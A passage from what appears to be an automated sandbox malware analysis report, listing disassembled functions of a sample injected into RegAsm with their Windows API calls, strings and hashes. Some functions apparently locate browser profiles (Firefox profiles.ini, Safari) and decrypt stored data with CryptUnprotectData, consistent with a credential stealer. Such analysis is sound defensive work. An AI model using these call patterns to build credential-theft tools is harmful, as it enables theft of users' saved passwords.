                                                                                                                                                                                                  • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                                                                                                                  Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _wcsicmp
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2081463915-0
                                                                                                                                                                                                  • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                                                                  • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                                                                                                  Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF), ref: 0040629C
                                                                                                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2136311172-0
                                                                                                                                                                                                  • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                  • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                                                                                  Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ??2@??3@
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1936579350-0
                                                                                                                                                                                                  • Opcode ID: c1d2223be94a68f833538aabce888aab0279aa93460cd9bacb51074fa57d6133
                                                                                                                                                                                                  • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c1d2223be94a68f833538aabce888aab0279aa93460cd9bacb51074fa57d6133
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                                                                                                  Function 0040B633 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                  • Opcode ID: 003685cf356b02fbbab95fb8d76c74631070c0c773c27bafbcebbee0aa56b295
                                                                                                                                                                                                  • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 003685cf356b02fbbab95fb8d76c74631070c0c773c27bafbcebbee0aa56b295
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                                                                                                  Function 0040AA04 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                  • Opcode ID: 196381b9ffc9c4816d42631a332da68c1e878a4277d624e181b366dd14fec77a
                                                                                                                                                                                                  • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 196381b9ffc9c4816d42631a332da68c1e878a4277d624e181b366dd14fec77a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                                                                                                                  Function 00415304 Relevance: 1.3, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                  • Opcode ID: 6cd4ef4cc40bf5a7540e7e9c88dd58f61d837874a50d1d7f714cafdae955675f
                                                                                                                                                                                                  • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6cd4ef4cc40bf5a7540e7e9c88dd58f61d837874a50d1d7f714cafdae955675f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E

                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                  Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                                                                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                  • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                                                                                                  • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                                                                                                  • free.MSVCRT ref: 00418370
                                                                                                                                                                                                    • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                                                                                                                                                    • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                                                                                                  • String ID: OsError 0x%x (%u)
                                                                                                                                                                                                  • API String ID: 2360000266-2664311388
                                                                                                                                                                                                  • Opcode ID: 7a793c3aafbc7d353b0e578237d4b483da7e71834841705644cfc2f7eabd6d8e
                                                                                                                                                                                                  • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7a793c3aafbc7d353b0e578237d4b483da7e71834841705644cfc2f7eabd6d8e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                                                                                                                  Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                                                                                                    • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                                    • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                                                  • memset.MSVCRT ref: 0040265F
                                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                                                                                                                    • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                    • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                                  • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _wcsicmp$Freememcpy$Library$CryptDataLocalUnprotectmemsetwcslen
                                                                                                                                                                                                  • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                                                                                  • API String ID: 2257402768-1134094380
                                                                                                                                                                                                  • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                                                                                                                                                  • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                                                                                                  Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                                                                                                  • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                                                                                                  • GetDC.USER32 ref: 004140E3
                                                                                                                                                                                                  • wcslen.MSVCRT ref: 00414123
                                                                                                                                                                                                  • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                                                                                                  • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 00414244
                                                                                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                                                                  • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                                  • API String ID: 2080319088-3046471546
                                                                                                                                                                                                  • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                                                                  • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                                                                                                  Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                                                                                                  • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                                                                                                  • memset.MSVCRT ref: 00413292
                                                                                                                                                                                                  • memset.MSVCRT ref: 004132B4
                                                                                                                                                                                                  • memset.MSVCRT ref: 004132CD
                                                                                                                                                                                                  • memset.MSVCRT ref: 004132E1
                                                                                                                                                                                                  • memset.MSVCRT ref: 004132FB
                                                                                                                                                                                                  • memset.MSVCRT ref: 00413310
                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                                                                                                  • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                                                                                                  • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                                                                                                  • memset.MSVCRT ref: 004133C0
                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                                                                                                  • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0041341F
                                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                                                                                                  • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                                                                                                  • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • {Unknown}, xrefs: 004132A6
                                                                                                                                                                                                  • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                                                                  • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                                                                  • API String ID: 4111938811-1819279800
                                                                                                                                                                                                  • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                                                                  • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                                                                                                                  Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 0040129E
                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                                                                                                  • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                                                                                                  • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                                                                                                  • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                                                                                                  • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                                                                                                  • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 829165378-0
                                                                                                                                                                                                  • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                                                                  • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                                                                                                  Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • memset.MSVCRT ref: 00404172
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                  • memset.MSVCRT ref: 00404200
                                                                                                                                                                                                  • memset.MSVCRT ref: 00404215
                                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                  • memset.MSVCRT ref: 0040426E
                                                                                                                                                                                                  • memset.MSVCRT ref: 004042CD
                                                                                                                                                                                                  • memset.MSVCRT ref: 004042E2
                                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 00404311
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                                                                                  • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                                                                                                  • API String ID: 2454223109-1580313836
                                                                                                                                                                                                  • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                                                                  • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                                                                                                  Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                                                                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                                  • API String ID: 2000436516-3842416460
                                                                                                                                                                                                  • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                                                  • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                                                                                                  Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                                    • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                  • free.MSVCRT ref: 0040E49A
                                                                                                                                                                                                    • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                                  • memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                    • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                                    • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                                                  • wcschr.MSVCRT ref: 0040E3B8
